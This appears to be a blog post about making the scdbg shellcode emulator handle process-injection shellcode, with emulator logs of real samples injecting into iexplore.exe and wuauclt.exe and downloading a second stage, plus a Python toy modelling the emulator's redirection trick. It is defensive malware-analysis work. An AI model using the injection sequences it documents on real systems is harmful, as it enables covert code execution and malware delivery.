scdbg vrs Process Injection

Author: David Zimmer
Date: 03.31.11 - 4:30pm

Experimented with some ideas about making scdbg compatible with process injection shellcode. Added support for the standard functions such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Even though we don't have any other process to work with, it turned out pretty slick, and I came up with a simple solution that allows the injection to "work" and then transfers execution right to the injected code so that what it does gets logged too. Basically I just treat remote process allocations and writes as allocations and writes in scdbg's own (emulated) process memory, then transfer execution to the specified "remote" address when CreateRemoteThread is called. Quite a simple implementation, but it has powerful results. It makes analyzing this type of shellcode so much easier.

401032 CreateProcessA( C:\Program Files\Internet Explorer\iexplore.exe, ) = 0x1269
401046 VirtualAllocEx(pid=1269, base=0 , sz=1000) = 60000
4010c3 WriteProcessMemory(pid=1269, base=60000 , buf=40120c, sz=1000)
4010f7 CreateRemoteThread(pid=1269, addr=60000 , arg=0, flags=0, *id=0)
Transferring execution to threadstart...
600ac LoadLibraryA(urlmon)
600bc URLDownloadToCacheFileA(http://removed, buf=12fcf8)
600d7 CreateProcessA( , c:\URLCacheTmpPath.exe ) = 0x1269
600ec TerminateThread(fffffffe) = 1

or

401403 CreateProcessA( wuauclt.exe, ) = 0x1269
40141a VirtualAllocEx(pid=1269, base=0 , sz=1a12) = 60000
401434 WriteProcessMemory(pid=1269, base=60000 , buf=401164, sz=1a12, written=12fdc4)
401446 GlobalAlloc(sz=cc) = 62000
40145a GetThreadContext(h=126a)
401468 SetThreadContext(h=126a, eip=60000)
40146f ResumeThread(h=126a)
Transferring Execution to threadstart 60000
6003d CreateThread(60070, 0) = 1
Transferring execution to threadstart...
600fc ExpandEnvironmentStringsA(%ALLUSERSPROFILE%\Plug1.dll, dst=40403f10, sz=104)

or

401156 FindWindowA(class=Progman, window=Program Manager)
401166 GetWindowThreadProcessId(h=0, buf=12fdd0)
401176 OpenProcess(access=1f0fff, inherit=0, pid=14077ac0)
401190 VirtualAllocEx(pid=99999999, base=0 , sz=1000) = 60000
4011ad WriteProcessMemory(pid=99999999, base=60000 , buf=4019dd, sz=310, written=0)
4011c3 CreateRemoteThread(pid=99999999, addr=60000 , arg=0, flags=0, *id=0)
Transferring execution to threadstart...
60190 LoadLibraryA(kernel32)
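As an added illustration (not scdbg's own code), here is the trick described above modelled in Python: a toy emulator whose remote-process API hooks all operate on one local memory map, with CreateRemoteThread, and the SetThreadContext/ResumeThread variant from the second log, redirecting execution into the buffer the shellcode wrote so the next stage can be logged. The class and method names, the log format, the stage-2 bytes and the two replayed call sequences (handle values copied from the logs above) are constructed assumptions.

```python
class InjectionEmu:
    """Toy model, not scdbg's code: remote-process APIs act on one shared emulated memory map."""
    def __init__(self):
        self.mem, self.next_base = {}, 0x60000       # base -> bytearray; first address as in the logs
        self.ctx, self.eip, self.log = {}, None, []  # handle -> eip; transfer target; API log
    def _region(self, addr):                         # allocation containing addr, whatever the "pid"
        for base, buf in self.mem.items():
            if base <= addr < base + len(buf):
                return base, buf
        raise ValueError(f"{addr:x} is not inside any emulated allocation")
    def VirtualAllocEx(self, pid, base, sz):
        addr = base or self.next_base
        self.next_base = (addr + sz + 0xFFF) & ~0xFFF   # page-align the next allocation
        self.mem[addr] = bytearray(sz)
        self.log.append(f"VirtualAllocEx(pid={pid:x}, base={base:x}, sz={sz:x}) = {addr:x}")
        return addr
    def WriteProcessMemory(self, pid, base, data):
        rbase, buf = self._region(base)              # pid is only logged: there is no other process
        buf[base - rbase:base - rbase + len(data)] = data
        self.log.append(f"WriteProcessMemory(pid={pid:x}, base={base:x}, sz={len(data):x})")
        return len(data)
    def CreateRemoteThread(self, pid, addr):
        self.log.append(f"CreateRemoteThread(pid={pid:x}, addr={addr:x})")
        return self._transfer(addr)
    def SetThreadContext(self, h, eip):              # suspended-thread hijack variant (second log)
        self.ctx[h] = eip
        self.log.append(f"SetThreadContext(h={h:x}, eip={eip:x})")
    def ResumeThread(self, h):
        self.log.append(f"ResumeThread(h={h:x})")
        return self._transfer(self.ctx[h])
    def _transfer(self, addr):
        self._region(addr)                           # refuse to "execute" memory nothing ever wrote
        self.log.append("Transferring execution to threadstart...")
        self.eip = addr
        return addr
    def read(self, addr, n):
        base, buf = self._region(addr)
        return bytes(buf[addr - base:addr - base + n])

def replay(calls):                                   # dispatch a recorded API sequence; returns (emu, eip)
    emu = InjectionEmu()
    for api, *args in calls:
        getattr(emu, api)(*args)
    return emu, emu.eip

STAGE2 = b"\x90" * 8 + b"\xc3"   # constructed placeholder bytes standing in for the injected stage
INJECT_CRT = [("VirtualAllocEx", 0x1269, 0, 0x1000), ("WriteProcessMemory", 0x1269, 0x60000, STAGE2),
              ("CreateRemoteThread", 0x1269, 0x60000)]                   # constructed from the first log
INJECT_CTX = [("VirtualAllocEx", 0x1269, 0, 0x1a12), ("WriteProcessMemory", 0x1269, 0x60000, STAGE2),
              ("SetThreadContext", 0x126a, 0x60000), ("ResumeThread", 0x126a)]  # from the second log
```

Replaying either sequence ends with eip pointing at 0x60000 and the written bytes readable there, which is exactly the point at which scdbg would carry on stepping the second stage.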